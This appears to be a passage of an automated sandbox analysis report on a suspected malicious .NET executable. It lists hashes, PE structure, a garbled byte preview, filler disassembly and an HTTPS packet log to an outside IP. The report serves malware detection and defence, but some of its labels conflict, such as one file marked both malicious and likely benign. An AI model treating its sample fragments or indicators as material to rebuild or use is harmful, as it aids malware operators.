                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n.{f.............................;... ...@....@.. ....................................`..................................;..J....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`.......$..............@..B.................;......H........(...............................................................0..s.......~....u....+@+E.+E+)+D+E.....+A+B+Cr...p+C,..-.......*..%,.X.....,.i2..-..,.*o....+..+..+..+..+..+..+.o....+.o....+...0...........9....8.....9....&.r?..p(....rq..p(....o.....s........s.....+)+.+0+1+3.+7+9.io......o.....-.....,..,..;(....+...+..+...+.o....+...+.o....+..,..-..o......,..o.......*s....8\....8]............<.O.....................!...+.~....u....r...p+.+.+......*(....+.( ...+.(...++.
                      Process:C:\Users\user\Desktop\6Ek4nfs2y1.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):26
                      Entropy (8bit):3.95006375643621
                      Encrypted:false
                      SSDEEP:3:ggPYV:rPYV
                      MD5:187F488E27DB4AF347237FE461A079AD
                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                      Malicious:true
                      Reputation:high, very likely benign file
                      Preview:[ZoneTransfer]....ZoneId=0
                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                      Entropy (8bit):5.073591133484043
                      TrID:
                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                      • Win32 Executable (generic) a (10002005/4) 49.78%
                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                      • Generic Win/DOS Executable (2004/3) 0.01%
                      • DOS Executable Generic (2002/1) 0.01%
                      File name:6Ek4nfs2y1.exe
                      File size:9'728 bytes
                      MD5:21ccb2cd9a4fbc259ab1110bc687b960
                      SHA1:10d68517383a76dd23e172c1f02a74cadf104b34
                      SHA256:c2d87b5b3c906a6725f420ee3e5cb28a81bcc756b1935d6875578bbc73978687
                      SHA512:9954846094f6326e8627d19a11522e745622a4bd1cf52c9d9230d10657252cd65e199075b6ccca24d082a55bac7f8850169917ed45ddf127ae854137bc65b0bc
                      SSDEEP:192:7/4Pvs83Kt8WbtgD+RWok9Ztk/PSLJNjj5NBCST5:r2s83Kt86OgWo0bqqLJZjUST
                      TLSH:8C12D5049FE94A37E2BB4BBA6CB662405335F3016E77C74E1484110B9FAB7E54E23B61
                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n.{f.............................;... ...@....@.. ....................................`................................
                      Icon Hash:90cececece8e8eb0
                      Entrypoint:0x403bea
                      Entrypoint Section:.text
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Time Stamp:0x667BFA6E [Wed Jun 26 11:24:30 2024 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:4
                      OS Version Minor:0
                      File Version Major:4
                      File Version Minor:0
                      Subsystem Version Major:4
                      Subsystem Version Minor:0
                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                      Instruction
                      jmp dword ptr [00402000h]
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      NameVirtual AddressVirtual Size Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IMPORT0x3ba00x4a.text
                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x40000x58e.rsrc
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x60000xc.reloc
                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                      .text0x20000x1bf00x1c00100ddeb1891bbc9af71233f1f779ade4False0.5604073660714286data5.537263467059152IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      .rsrc0x40000x58e0x6003b025322b4e60eb3a6b49a6150939b3bFalse0.4166666666666667data4.082213589688012IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      .reloc0x60000xc0x200e3b03db2724ee76f001684a75b2dc4b8False0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                      NameRVASizeTypeLanguageCountryZLIB Complexity
                      RT_VERSION0x405c0x30cdata0.4256410256410256
                      RT_MANIFEST0x43a40x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                      DLLImport
                      mscoree.dll_CorExeMain
                      TimestampSource PortDest PortSource IPDest IP
                      Jul 3, 2024 16:16:56.050921917 CEST49704443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:16:56.050959110 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:56.051047087 CEST49704443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:16:56.103478909 CEST49704443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:16:56.103501081 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:56.589380980 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:56.589550018 CEST49704443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:16:56.617718935 CEST49704443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:16:56.617743969 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:56.618134975 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:56.665559053 CEST49704443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:16:56.666393995 CEST49704443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:16:56.712508917 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.258688927 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.258737087 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.258765936 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.258800983 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.258800030 CEST49704443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:16:57.258816004 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.258853912 CEST49704443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:16:57.306632996 CEST49704443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:16:57.306655884 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.349201918 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.349580050 CEST49704443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:16:57.349592924 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.399900913 CEST49704443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:16:57.442419052 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.442498922 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.442528009 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.442574024 CEST49704443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:16:57.442585945 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.442642927 CEST49704443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:16:57.442804098 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.443094969 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.443128109 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.443157911 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.443162918 CEST49704443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:16:57.443176031 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.443236113 CEST49704443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:16:57.444015026 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.444053888 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.444088936 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.444128990 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.444328070 CEST49704443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:16:57.444329023 CEST49704443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:16:57.444336891 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.444427013 CEST49704443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:16:57.444945097 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.445008039 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.445071936 CEST49704443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:16:57.445079088 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.493741035 CEST49704443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:16:57.493752956 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.540883064 CEST49704443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:16:57.556298971 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.556366920 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.556396961 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.556427002 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.556462049 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.556472063 CEST49704443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:16:57.556472063 CEST49704443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:16:57.556493044 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.556587934 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.556767941 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.556797981 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.556811094 CEST49704443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:16:57.556811094 CEST49704443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:16:57.556821108 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.556852102 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.556898117 CEST49704443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:16:57.556905985 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.556966066 CEST49704443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:16:57.557539940 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.557775021 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.557811975 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.557979107 CEST49704443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:16:57.557990074 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.558068991 CEST49704443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:16:57.558393955 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.558456898 CEST49704443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:16:57.558496952 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.558585882 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.558866024 CEST49704443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:16:57.558872938 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.558938980 CEST49704443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:16:57.559325933 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.559391975 CEST49704443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:16:57.559441090 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.559523106 CEST49704443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:16:57.560221910 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.560456038 CEST49704443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:16:57.571630001 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.571818113 CEST49704443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:16:57.646369934 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.646423101 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.646523952 CEST49704443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:16:57.646523952 CEST49704443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:16:57.646538019 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.696909904 CEST49704443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:16:57.699081898 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.699096918 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.699256897 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.699296951 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.699306965 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.699311018 CEST49704443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:16:57.699311018 CEST49704443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:16:57.699322939 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.699435949 CEST49704443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:16:57.699475050 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.699543953 CEST49704443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:16:57.699549913 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.699589014 CEST49704443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:16:57.701420069 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.701524019 CEST49704443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:16:57.701564074 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.701627016 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.701661110 CEST49704443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:16:57.701661110 CEST49704443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:16:57.701675892 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.701773882 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.701813936 CEST49704443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:16:57.701829910 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.701999903 CEST49704443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:16:57.702213049 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.702261925 CEST49704443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:16:57.702369928 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.702405930 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.702424049 CEST49704443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:16:57.702439070 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.702553988 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.702585936 CEST49704443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:16:57.702786922 CEST49704443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:16:57.702792883 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.702867031 CEST49704443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:16:57.703761101 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.703799009 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.703830004 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.703861952 CEST49704443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:16:57.703861952 CEST49704443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:16:57.703870058 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.703917027 CEST49704443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:16:57.703989029 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.704025030 CEST49704443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:16:57.704041958 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.704129934 CEST49704443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:16:57.704145908 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.704193115 CEST49704443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:16:57.704356909 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.704416990 CEST49704443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:16:57.737071991 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.737119913 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.737195015 CEST49704443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:16:57.737215042 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.737574100 CEST49704443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:16:57.789391041 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.789463997 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.789485931 CEST49704443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:16:57.789495945 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.789509058 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.789642096 CEST49704443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:16:57.789642096 CEST49704443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:16:57.790596008 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.790662050 CEST49704443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:16:57.790682077 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.790812016 CEST49704443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:16:57.845136881 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.845189095 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.845349073 CEST49704443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:16:57.845369101 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.845505953 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.845526934 CEST49704443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:16:57.845535040 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.845552921 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.845655918 CEST49704443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:16:57.845655918 CEST49704443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:16:57.845982075 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.846034050 CEST49704443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:16:57.846050978 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.846081972 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.846241951 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.846421957 CEST49704443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:16:57.846421957 CEST49704443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:16:57.846431017 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.847125053 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.847141981 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.847187042 CEST49704443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:16:57.847208023 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.847424030 CEST49704443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:16:57.847747087 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.847764969 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.847816944 CEST49704443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:16:57.847836018 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.850380898 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.850395918 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.850449085 CEST49704443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:16:57.850467920 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.851300955 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.851321936 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.851700068 CEST49704443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:16:57.851708889 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.852045059 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.852061987 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.852288008 CEST49704443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:16:57.852297068 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.880269051 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.880292892 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.880373955 CEST49704443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:16:57.880393028 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.880568981 CEST49704443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:16:57.935810089 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.935841084 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.936033010 CEST49704443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:16:57.936048985 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.936111927 CEST49704443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:16:57.936250925 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.936275959 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.936357975 CEST49704443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:16:57.936357975 CEST49704443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:16:57.936366081 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.936422110 CEST49704443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:16:57.936815023 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.936831951 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.936861038 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.936983109 CEST49704443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:16:57.936983109 CEST49704443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:16:57.936990976 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.937299013 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.937320948 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.937383890 CEST49704443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:16:57.937383890 CEST49704443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:16:57.937391996 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.940167904 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.940182924 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.940258980 CEST49704443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:16:57.940265894 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.940356970 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.940371037 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.940407038 CEST49704443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:16:57.940414906 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.940432072 CEST49704443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:16:57.940502882 CEST49704443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:16:57.996196032 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.996222019 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.996414900 CEST49704443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:16:57.996428967 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:57.996498108 CEST49704443192.168.2.10104.21.10.178
                      Jul 3, 2024 16:16:58.011790991 CEST44349704104.21.10.178192.168.2.10
                      Jul 3, 2024 16:16:58.011816025 CEST44349704104.21.10.178192.168.2.10
